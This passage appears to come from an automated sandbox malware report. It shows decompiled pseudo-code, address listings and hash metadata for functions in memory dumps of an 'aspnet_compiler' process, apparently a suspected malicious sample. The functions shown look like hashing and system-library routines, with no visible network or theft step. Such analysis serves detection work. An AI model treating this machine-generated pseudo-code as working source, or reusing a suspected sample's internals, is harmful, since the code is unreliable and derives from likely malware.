					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                  0x00408c8b
                                                  0x00408c8f
                                                  0x00408c91
                                                  0x00408c91
                                                  0x00408c94
                                                  0x00408cb6
                                                  0x00408cdc
                                                  0x00408d02
                                                  0x00408d24
                                                  0x00408d2b
                                                  0x00408d2e
                                                  0x00408d31
                                                  0x00408d3a
                                                  0x00408d40
                                                  0x00408d47
                                                  0x00408d58
                                                  0x00408d5b
                                                  0x00408d5e
                                                  0x00408d62
                                                  0x00408d64
                                                  0x00408d66
                                                  0x00408d6f
                                                  0x00408d72
                                                  0x00408d75
                                                  0x00408d80
                                                  0x00408d86
                                                  0x00408d88
                                                  0x00408d88
                                                  0x00408d8b
                                                  0x00408d8e
                                                  0x00408d8e
                                                  0x00408d93
                                                  0x00408d95
                                                  0x00408d98
                                                  0x00408d9b
                                                  0x00408da1
                                                  0x00408da4
                                                  0x00408da7
                                                  0x00408db0
                                                  0x00408db6
                                                  0x00408dbf
                                                  0x00408dce
                                                  0x00408dd5
                                                  0x00408dd8
                                                  0x00408ddb
                                                  0x00408de4
                                                  0x00408de7
                                                  0x00408dea
                                                  0x00408e02
                                                  0x00408e09
                                                  0x00408e0b
                                                  0x00408e0e
                                                  0x00408e11
                                                  0x00408e1a
                                                  0x00408e21
                                                  0x00408e24
                                                  0x00408e27
                                                  0x00408e36
                                                  0x00408e3d
                                                  0x00408e40
                                                  0x00408e43
                                                  0x00408e4c
                                                  0x00408e56
                                                  0x00408e59
                                                  0x00408e65
                                                  0x00408e68
                                                  0x00408e6f
                                                  0x00408e72
                                                  0x00408e75
                                                  0x00408e7a
                                                  0x00408e7d
                                                  0x00408e86
                                                  0x00408e97
                                                  0x00408e9a
                                                  0x00408e9d
                                                  0x00408ea4
                                                  0x00408ea7
                                                  0x00408eaa
                                                  0x00408ead
                                                  0x00408eaf
                                                  0x00408eb2
                                                  0x00408eb5
                                                  0x00408ebe
                                                  0x00408ec3
                                                  0x00408ec3
                                                  0x00408ed8
                                                  0x00408edb
                                                  0x00408ede
                                                  0x00408ee5
                                                  0x00408ee8
                                                  0x00408eeb
                                                  0x00408f00
                                                  0x00408f07
                                                  0x00408f0a
                                                  0x00408f0e
                                                  0x00408f11
                                                  0x00408f16
                                                  0x00408f19
                                                  0x00408f28
                                                  0x00408f2b
                                                  0x00408f32
                                                  0x00408f35
                                                  0x00408f38
                                                  0x00408f3b
                                                  0x00408f3e
                                                  0x00408f46
                                                  0x00408f54
                                                  0x00408f57
                                                  0x00408f5a
                                                  0x00408f5a
                                                  0x00408f61
                                                  0x00408f64
                                                  0x00408f67
                                                  0x00408f6f
                                                  0x00408f7d
                                                  0x00408f80
                                                  0x00408f87
                                                  0x00408f8a
                                                  0x00408f8d
                                                  0x00408f90
                                                  0x00408f93
                                                  0x00408f9c
                                                  0x00408fa3
                                                  0x00408fa3
                                                  0x00408fa9
                                                  0x00408fc2
                                                  0x00408fc5
                                                  0x00408fcc
                                                  0x00408fcf
                                                  0x00408fd2
                                                  0x00408fe4
                                                  0x00408fee
                                                  0x00408ff1
                                                  0x00408ffa
                                                  0x00408ffd
                                                  0x00409004
                                                  0x00409007
                                                  0x0040900d
                                                  0x00409020
                                                  0x00409027
                                                  0x0040902a
                                                  0x0040902d
                                                  0x00409030
                                                  0x00409039
                                                  0x0040903c
                                                  0x0040904f
                                                  0x00409052
                                                  0x0040905c
                                                  0x0040905f
                                                  0x00409061
                                                  0x0040906a
                                                  0x0040906d
                                                  0x00409080
                                                  0x00409086
                                                  0x00409089
                                                  0x00409090
                                                  0x00409092
                                                  0x00409095
                                                  0x00409098
                                                  0x0040909b
                                                  0x0040909e
                                                  0x004090a1
                                                  0x004090aa
                                                  0x004090af
                                                  0x004090b2
                                                  0x004090b2
                                                  0x004090c5
                                                  0x004090c8
                                                  0x004090cb
                                                  0x004090d2
                                                  0x004090d5
                                                  0x004090d8
                                                  0x004090db
                                                  0x004090ee
                                                  0x004090f1
                                                  0x004090fc
                                                  0x004090ff
                                                  0x0040910b
                                                  0x0040910e
                                                  0x00409114
                                                  0x00409117
                                                  0x0040911a
                                                  0x00409121
                                                  0x00409131
                                                  0x00409134
                                                  0x0040913a
                                                  0x0040913d
                                                  0x00409144
                                                  0x00409146
                                                  0x00409149
                                                  0x0040914c
                                                  0x0040914f
                                                  0x00409152
                                                  0x00409159
                                                  0x00409168
                                                  0x0040916b
                                                  0x00409172
                                                  0x00409175
                                                  0x00409178
                                                  0x0040917b
                                                  0x0040917e
                                                  0x00409181
                                                  0x00409184
                                                  0x0040918d
                                                  0x0040919e
                                                  0x004091a6
                                                  0x004091ac
                                                  0x004091af
                                                  0x004091b1
                                                  0x004091b4
                                                  0x004091b7
                                                  0x004091c4

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (
                                                  • API String ID: 0-3887548279
                                                  • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                  • Instruction ID: dca45830a30d81ac6efaa6d2be11be043bd47579324ad2ebb8b4e79e22eae18d
                                                  • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                  • Instruction Fuzzy Hash: 90022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018AB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E018AB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x197d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(L018A7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							L01958CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = L018C9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L018CB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = L018CCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(L018A7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L01958F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L018CAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1978628; // 0x0
								_v68 = _t77;
								_t78 =  *0x197862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1978628; // 0x0
							_t116 =  *0x197862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                  0x018ab94c
                                                  0x018ab956
                                                  0x018ab95c
                                                  0x018ab95e
                                                  0x018ab964
                                                  0x018ab969
                                                  0x018ab96d
                                                  0x018ab96d
                                                  0x018ab970
                                                  0x018ab974
                                                  0x018ab97a
                                                  0x018abadf
                                                  0x018abadf
                                                  0x018abae2
                                                  0x018abae4
                                                  0x018abae6
                                                  0x018abaf0
                                                  0x018f2cb8
                                                  0x018abaf6
                                                  0x018abaf6
                                                  0x018abaf6
                                                  0x018abafd
                                                  0x018abb1f
                                                  0x018abb1f
                                                  0x018abaff
                                                  0x018abb00
                                                  0x018abb00
                                                  0x018abb03
                                                  0x018abb03
                                                  0x018abacb
                                                  0x018abacf
                                                  0x018abad0
                                                  0x018abad1
                                                  0x018abadc
                                                  0x018abadc
                                                  0x018ab980
                                                  0x018ab980
                                                  0x018ab988
                                                  0x018ab98b
                                                  0x018ab98d
                                                  0x018ab990
                                                  0x018ab993
                                                  0x018ab999
                                                  0x018ab99b
                                                  0x018ab9a1
                                                  0x018ab9a5
                                                  0x018ab9aa
                                                  0x018ab9b0
                                                  0x018ab9bb
                                                  0x018ab9c0
                                                  0x018ab9c3
                                                  0x018ab9ca
                                                  0x018ab9cc
                                                  0x018ab9cf
                                                  0x018ab9d3
                                                  0x018ab9d7
                                                  0x018aba94
                                                  0x018aba94
                                                  0x018aba98
                                                  0x018abaa3
                                                  0x018f2ccb
                                                  0x018abaa9
                                                  0x018abaa9
                                                  0x018abaa9
                                                  0x018abab1
                                                  0x018f2cd5
                                                  0x018f2cdd
                                                  0x018f2cdd
                                                  0x018ababb
                                                  0x018ababc
                                                  0x018abac2
                                                  0x018abac3
                                                  0x018abac3
                                                  0x018abac6
                                                  0x00000000
                                                  0x018ab9dd
                                                  0x018ab9dd
                                                  0x018ab9e7
                                                  0x018ab9e7
                                                  0x018ab9ec
                                                  0x018ab9ec
                                                  0x018ab9f1
                                                  0x018ab9f5
                                                  0x018ab9fa
                                                  0x018aba00
                                                  0x018aba0c
                                                  0x018aba10
                                                  0x018aba10
                                                  0x018aba12
                                                  0x018aba18
                                                  0x00000000
                                                  0x00000000
                                                  0x018abb26
                                                  0x018abb26
                                                  0x018aba1e
                                                  0x018aba1e
                                                  0x018aba23
                                                  0x018aba25
                                                  0x018aba2c
                                                  0x018aba30
                                                  0x018aba35
                                                  0x018aba35
                                                  0x018aba41
                                                  0x018aba46
                                                  0x018aba4c
                                                  0x018aba50
                                                  0x018aba54
                                                  0x018aba6a
                                                  0x018aba6e
                                                  0x018aba70
                                                  0x018aba74
                                                  0x018aba78
                                                  0x018aba7a
                                                  0x018aba7c
                                                  0x018aba8e
                                                  0x018aba90
                                                  0x018aba92
                                                  0x018abb14
                                                  0x018abb14
                                                  0x018abb16
                                                  0x018abb16
                                                  0x00000000
                                                  0x018aba7c
                                                  0x018abb0a
                                                  0x018abb0d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018abb0f

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018AB9A5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 885266447-0
                                                  • Opcode ID: 369a0de6706cc4da7da6f49ea0a412e2fde15c1fc9941827c2d139e1bf0d7f5e
                                                  • Instruction ID: 0456222f909b4993d39d9bc785be6add06090b3ecb0d6507ee062772882063c5
                                                  • Opcode Fuzzy Hash: 369a0de6706cc4da7da6f49ea0a412e2fde15c1fc9941827c2d139e1bf0d7f5e
                                                  • Instruction Fuzzy Hash: 9F517771A09341CFD720CF6DC09092ABBE5FB88714F94896EEA85D7345E731EA40CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0188B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E0188B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x195f7a8);
				E018DD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E018DD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E018CD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E018CF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L018DDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E018CB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												L018CB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E018CE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E018CA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                  0x0188b171
                                                  0x0188b171
                                                  0x0188b171
                                                  0x0188b171
                                                  0x0188b171
                                                  0x0188b176
                                                  0x0188b17b
                                                  0x0188b180
                                                  0x0188b186
                                                  0x0188b18f
                                                  0x0188b198
                                                  0x0188b1a4
                                                  0x0188b1aa
                                                  0x018e4802
                                                  0x018e4802
                                                  0x018e4805
                                                  0x018e480c
                                                  0x018e480e
                                                  0x0188b1d1
                                                  0x0188b1d3
                                                  0x0188b1de
                                                  0x0188b1de
                                                  0x018e4817
                                                  0x018e481e
                                                  0x018e4820
                                                  0x018e4822
                                                  0x018e4822
                                                  0x018e4824
                                                  0x018e4824
                                                  0x018e482a
                                                  0x00000000
                                                  0x00000000
                                                  0x018e4835
                                                  0x018e483a
                                                  0x018e483d
                                                  0x018e483f
                                                  0x018e4842
                                                  0x018e4842
                                                  0x018e4842
                                                  0x018e4846
                                                  0x018e484c
                                                  0x018e484e
                                                  0x018e4851
                                                  0x018e4851
                                                  0x018e4853
                                                  0x018e4854
                                                  0x018e4854
                                                  0x018e4858
                                                  0x018e485a
                                                  0x018e485a
                                                  0x018e485d
                                                  0x018e485f
                                                  0x018e4861
                                                  0x018e4861
                                                  0x018e4866
                                                  0x018e486b
                                                  0x018e486e
                                                  0x018e4871
                                                  0x018e4876
                                                  0x018e4876
                                                  0x018e4878
                                                  0x018e487b
                                                  0x018e4884
                                                  0x018e4884
                                                  0x00000000
                                                  0x018e487d
                                                  0x018e487d
                                                  0x018e4882
                                                  0x018e4889
                                                  0x018e4889
                                                  0x018e488f
                                                  0x018e4891
                                                  0x018e48e0
                                                  0x018e48e2
                                                  0x018e48e4
                                                  0x018e48e4
                                                  0x018e48e7
                                                  0x018e48e7
                                                  0x018e48ed
                                                  0x018e48f4
                                                  0x018e48f6
                                                  0x018e4951
                                                  0x018e4951
                                                  0x018e4953
                                                  0x018e4953
                                                  0x018e4956
                                                  0x018e4956
                                                  0x018e4958
                                                  0x018e4959
                                                  0x018e4959
                                                  0x018e495d
                                                  0x018e495d
                                                  0x018e495f
                                                  0x018e495f
                                                  0x018e4965
                                                  0x018e4969
                                                  0x018e49ba
                                                  0x018e49ba
                                                  0x018e49c1
                                                  0x018e49c5
                                                  0x018e49cc
                                                  0x018e49d4
                                                  0x018e49d7
                                                  0x018e49da
                                                  0x018e49e4
                                                  0x018e49e5
                                                  0x018e49f3
                                                  0x018e4a02
                                                  0x00000000
                                                  0x018e4a02
                                                  0x018e4972
                                                  0x018e4974
                                                  0x00000000
                                                  0x00000000
                                                  0x018e4976
                                                  0x018e4979
                                                  0x018e4982
                                                  0x018e4983
                                                  0x018e4984
                                                  0x018e498b
                                                  0x018e498d
                                                  0x018e4991
                                                  0x018e4993
                                                  0x018e4999
                                                  0x018e499d
                                                  0x018e49a2
                                                  0x018e49a2
                                                  0x018e49a2
                                                  0x018e4999
                                                  0x018e49ac
                                                  0x00000000
                                                  0x018e49b3
                                                  0x018e48f8
                                                  0x018e48fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018e48fe
                                                  0x018e4895
                                                  0x018e489c
                                                  0x018e48ad
                                                  0x018e48b2
                                                  0x018e48b5
                                                  0x018e48b7
                                                  0x018e48ba
                                                  0x018e48bc
                                                  0x018e48c6
                                                  0x018e48c6
                                                  0x018e48cb
                                                  0x018e48d1
                                                  0x018e48d4
                                                  0x018e48d8
                                                  0x018e48d8
                                                  0x00000000
                                                  0x018e48d8
                                                  0x018e48be
                                                  0x018e48c0
                                                  0x00000000
                                                  0x00000000
                                                  0x018e48c2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018e48c4
                                                  0x00000000
                                                  0x018e4882
                                                  0x018e487b
                                                  0x018e4904
                                                  0x018e4906
                                                  0x00000000
                                                  0x00000000
                                                  0x018e4908
                                                  0x018e490e
                                                  0x00000000
                                                  0x00000000
                                                  0x018e4910
                                                  0x018e4917
                                                  0x018e4917
                                                  0x00000000
                                                  0x018e4917
                                                  0x0188b1ba
                                                  0x018e47f9
                                                  0x018e47fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018e47fc
                                                  0x0188b1c0
                                                  0x0188b1c0
                                                  0x0188b1c3
                                                  0x0188b1cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: _vswprintf_s
                                                  • String ID:
                                                  • API String ID: 677850445-0
                                                  • Opcode ID: 205822e1eaaf7cc5511053b17ef00b6eb02c473cab09a2137f11d7b71e722e03
                                                  • Instruction ID: fb8f82ee0718733e9a902d3cbb59b8442989b40916cbf3056913785463fceaed
                                                  • Opcode Fuzzy Hash: 205822e1eaaf7cc5511053b17ef00b6eb02c473cab09a2137f11d7b71e722e03
                                                  • Instruction Fuzzy Hash: A051E171D002698EEB31DF688848BAEBBF1AF42710F1041ADD85DEB292D7758A41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 83%
                                                  			E018B2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546912135) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t252;
				signed int _t254;
				intOrPtr _t256;
				signed int _t259;
				signed int _t266;
				signed int _t269;
				signed int _t277;
				signed int _t279;
				signed int _t284;
				signed int _t286;
				void* _t288;
				signed int _t289;
				unsigned int _t292;
				signed int _t296;
				intOrPtr* _t297;
				signed int _t298;
				signed int _t302;
				intOrPtr _t314;
				signed int _t323;
				signed int _t325;
				signed int _t326;
				signed int _t330;
				signed int _t331;
				signed int _t335;
				signed int _t337;
				signed int _t339;
				void* _t340;
				intOrPtr _t342;

				_t337 = _t339;
				_t340 = _t339 - 0x4c;
				_v8 =  *0x197d360 ^ _t337;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t330 = 0x197b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t292 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t284 = 0x48;
				_t312 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t323 = 0;
				_v37 = _t312;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t331 = 0xc0000106;
						goto L32;
					} else {
						_t330 = L018A4620(_t292,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t330;
						__eflags = _t330;
						if(_t330 == 0) {
							_t331 = 0xc0000017;
							goto L32;
						} else {
							 *(_t330 + 0x44) =  *(_t330 + 0x44) & 0x00000000;
							_t50 = _t330 + 0x48; // 0x48
							_t325 = _t50;
							_t312 = _v32;
